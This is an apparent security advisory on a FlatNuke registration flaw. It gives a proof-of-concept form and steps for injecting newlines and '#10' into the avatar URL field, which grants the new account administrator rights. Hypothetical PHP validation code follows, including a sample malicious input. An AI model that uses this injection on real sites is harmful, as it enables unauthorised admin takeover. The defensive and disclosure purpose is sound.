FlatNuke Form Submission Input Validation Vulnerability
The following example submission form was provided:

<form action="http://www.sitewithflatnuke.org/forum/index.php" method=post name="registra">
<input type=hidden name=op value=reg>
Username*: <input name=nome><br>
Password*: <input name="regpass" type="password"><br>
Password*: <input name="reregpass" type="password"><br>
Name: <input name=anag><br>
E-mail: <input name=email><br>
Homepage: <input name=homep value="http://"><br>
Job: <input name=prof><br>
Country: <input name=prov><br>
<select name="ava">
<option value="">----</option>
<option value="blank.png">blank.png</option>
</select>
<br><br>
Or remote image URL:<br><br>
<textarea name="url_avatar" rows=5 cols=23></textarea>
<br>
Signature: <textarea name=firma rows=5 cols=23></textarea>
<center>
<input type=submit value="Send">
</center>
</form>

Open the form in a Web browser and enter information in all fields. In the url_avatar field, press Enter at least twice and insert the text "#10" without quotes. Submitting this form will cause the account to be created as an administrator account.
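
One way to validate the registration fields against the issue described above, as an added example that is not FlatNuke's own code and not part of the original advisory. The advisory does not describe the storage format, so the example assumes a profile is written as one "#"-prefixed value per line with the privilege level on the last line; the field order, `DEFAULT_LEVEL` and the function names are hypothetical.

```php
<?php
// Added example, not FlatNuke source. ASSUMED record layout: one "#"-prefixed
// value per line in PROFILE_FIELDS order, privilege level on the last line.
const PROFILE_FIELDS = ['nome', 'anag', 'email', 'homep', 'prof', 'prov', 'url_avatar', 'firma'];
const DEFAULT_LEVEL = 0; // hypothetical value for an ordinary user

// Reject anything that could start a new line (and so a new field) in the record.
function clean_field(string $name, $value): string
{
    if (!is_string($value)) { // e.g. url_avatar[]=... arrives as an array
        throw new InvalidArgumentException("field '$name' is not a string");
    }
    // Bytes 0x00-0x1F and 0x7F include CR and LF.
    if (preg_match('/[\x00-\x1F\x7F]/', $value)) {
        throw new InvalidArgumentException("control character in field '$name'");
    }
    return trim($value);
}

function build_record(array $post): string
{
    $lines = [];
    foreach (PROFILE_FIELDS as $name) {
        $value = $post[$name] ?? '';
        if ($name === 'firma' && is_string($value)) {
            // A signature may span lines in the form; store it on one line.
            $value = preg_replace('/[\r\n]+/', ' ', $value);
        }
        $lines[] = '#' . clean_field($name, $value);
    }
    $lines[] = '#' . DEFAULT_LEVEL; // set by the server, never taken from the request
    return implode("\n", $lines) . "\n";
}

// Reader side: refuse a record whose line count does not match the layout.
function read_level(string $record): int
{
    $lines = explode("\n", rtrim($record, "\n"));
    if (count($lines) !== count(PROFILE_FIELDS) + 1) {
        throw new UnexpectedValueException('record has wrong number of lines');
    }
    return (int) substr(end($lines), 1);
}

// Constructed sample inputs.
$ok  = ['nome' => 'alice', 'email' => 'alice@example.org', 'firma' => "line one\r\nline two"];
$bad = ['nome' => 'mallory', 'url_avatar' => "x\n\n#10"];
echo read_level(build_record($ok)), "\n";
try { build_record($bad); } catch (InvalidArgumentException $e) { echo 'rejected: ', $e->getMessage(), "\n"; }
```

The check on the reader side matters as much as the one on the writer side: a record written before the fix may already contain shifted lines.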